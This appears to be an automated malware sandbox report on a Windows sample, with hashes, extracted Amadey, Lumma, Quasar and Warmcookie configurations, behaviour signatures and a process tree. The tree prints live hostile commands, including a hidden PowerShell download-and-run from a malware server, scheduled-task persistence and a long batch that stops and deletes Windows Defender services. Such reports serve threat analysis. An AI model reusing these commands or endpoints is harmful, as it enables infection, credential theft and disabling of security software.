Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
-
submitted
01/04/2025, 17:40
General
-
Target
2025-04-01_13ac84957cce7c22118dac95731264ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
13ac84957cce7c22118dac95731264ef
-
SHA1
9e467a6ca8b367e576c3d8a66ea0daac4c4335b4
-
SHA256
c4cc70527adb8bcb862c7d2a97466a6c5364206a76b140b0197fcb00304b87f5
-
SHA512
6312fa0ccfe31d94f970f1263db0a94e176c8470c256a225cc5052c29f62e9b19803bb1bb228e94579be79f95a8addc9a23ce86470bc27e04a8d7b9193555478
-
SSDEEP
24576:6qDEvCTbMWu7rQYlBQcBiT6rprG8a0qu:6TvC/MTQYxsWR7a0q
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://navstarx.shop/FoaJSi
https://dmetalsyo.digital/opsa
https://ironloxp.live/aksdd
https://starcloc.bet/GOksAo
https://advennture.top/GKsiio
https://-targett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://targett.top/dsANGt
https://hadvennture.top/GKsiio
https://anavstarx.shop/FoaJSi
https://wstarcloc.bet/GOksAo
https://atargett.top/dsANGt
Extracted
amadey
5.33
faec90
-
install_dir
52907c9546
-
install_file
tgvazx.exe
-
strings_key
cc9d94f7503394295f4824f8cfd50608
-
url_paths
/Di0Her478/index.php
Extracted
quasar
1.4.1
CyberPunk
dakar.wohowoho.com:443
dakar.wohowoho.com:80
206.206.76.75:443
206.206.76.75:80
62.60.226.176:80
62.60.226.176:443
5e809a5b-bb22-41b6-af20-5285e99040d3
-
encryption_key
A98DEEE2D49BDF1C5183B3079E9B28E281586F6F
-
install_name
chrome.exe
-
log_directory
Logs
-
reconnect_delay
30000
-
startup_key
GoogleChrome
-
subdirectory
Google\Chrome
Extracted
warmcookie
192.36.57.50
-
mutex
62580f79-f0e4-46c9-9fe6-041328dce2b7
-
user_agent
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Amadey family
-
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
-
Lumma family
-
Modifies security service 2 TTPs 2 IoCs
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
-
Warmcookie family
-
Warmcookie, Badspace
Warmcookie aka Badspace is a backdoor written in C++.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 17 IoCs
-
Possible privilege escalation attempt 2 IoCs
-
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 46 IoCs
-
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 64 IoCs
-
Modifies file permissions 1 TTPs 2 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 29 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
-
Suspicious use of SetThreadContext 20 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 24 IoCs
-
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 63 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies data under HKEY_USERS 54 IoCs
-
Modifies registry class 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious behavior: MapViewOfSection 17 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\2025-04-01_13ac84957cce7c22118dac95731264ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-01_13ac84957cce7c22118dac95731264ef_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn R5ifgma6ZoY /tr "mshta C:\Users\Admin\AppData\Local\Temp\GAyYH0qN1.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn R5ifgma6ZoY /tr "mshta C:\Users\Admin\AppData\Local\Temp\GAyYH0qN1.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\GAyYH0qN1.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'O31W2T6IPMNEAMGWUKE2WQIBPORLHILF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\TempO31W2T6IPMNEAMGWUKE2WQIBPORLHILF.EXE"C:\Users\Admin\AppData\Local\TempO31W2T6IPMNEAMGWUKE2WQIBPORLHILF.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe"C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe"C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Abspawnhlp.exe"C:\Users\Admin\Abspawnhlp.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe9⤵
- Downloads MZ/PE file
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000910271\FRDKTUCO.msi" /quiet10⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe"C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\Abspawnhlp.exe"C:\Users\Admin\Abspawnhlp.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Abspawnhlp.exeC:\Users\Admin\Abspawnhlp.exe12⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe12⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe"C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe"10⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000950271\UVXEUGTZ.msi" /quiet10⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe"C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe"10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5880 -s 8011⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000970271\NBFRPMVB.msi" /quiet10⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe"C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe"10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe"C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\CamMenuMaker.exe"C:\Users\Admin\CamMenuMaker.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\CamMenuMaker.exeC:\Users\Admin\CamMenuMaker.exe12⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Enc UgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJwB3AGkAdwBlAHIANwAuADUALgBlAHgAZQAnACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAdwBpAHcAZQByADcALgA1AC4AZQB4AGUAJwApACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ATwBuAGMAZQAgAC0AQQB0ACAAKABHAGUAdAAtAEQAYQB0AGUAKQAgAC0AUgBlAHAAZQB0AGkAdABpAG8AbgBJAG4AdABlAHIAdgBhAGwAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBNAGkAbgB1AHQAZQBzACAANQApACkAIAAtAFUAcwBlAHIAIAAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlACAALQBSAHUAbgBMAGUAdgBlAGwAIABIAGkAZwBoAGUAcwB0ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0AUwBlAGMAbwBuAGQAcwAgADAAKQAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAKQAgAC0ARgBvAHIAYwBlAA==13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe12⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe9⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe"C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\ProgramData\Google\Chrome\chrome.exe"C:\ProgramData\Google\Chrome\chrome.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\10407870101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10407870101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D6B4.tmp\D6B5.tmp\D6B6.bat C:\Users\Admin\AppData\Local\Temp\261.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D76F.tmp\D770.tmp\D771.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"10⤵
- Drops file in Program Files directory
-
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408160101\e7cc698125.exe"C:\Users\Admin\AppData\Local\Temp\10408160101\e7cc698125.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\10408170101\HAe88WC.exe"C:\Users\Admin\AppData\Local\Temp\10408170101\HAe88WC.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408180101\16385a18f9.exe"C:\Users\Admin\AppData\Local\Temp\10408180101\16385a18f9.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\10408190101\9e9ad7156c.exe"C:\Users\Admin\AppData\Local\Temp\10408190101\9e9ad7156c.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\10408200101\PQPYAYJJ.exe"C:\Users\Admin\AppData\Local\Temp\10408200101\PQPYAYJJ.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\Abspawnhlp.exe"C:\Users\Admin\Abspawnhlp.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe9⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe9⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10408210101\e3267e0a89.exe"C:\Users\Admin\AppData\Local\Temp\10408210101\e3267e0a89.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
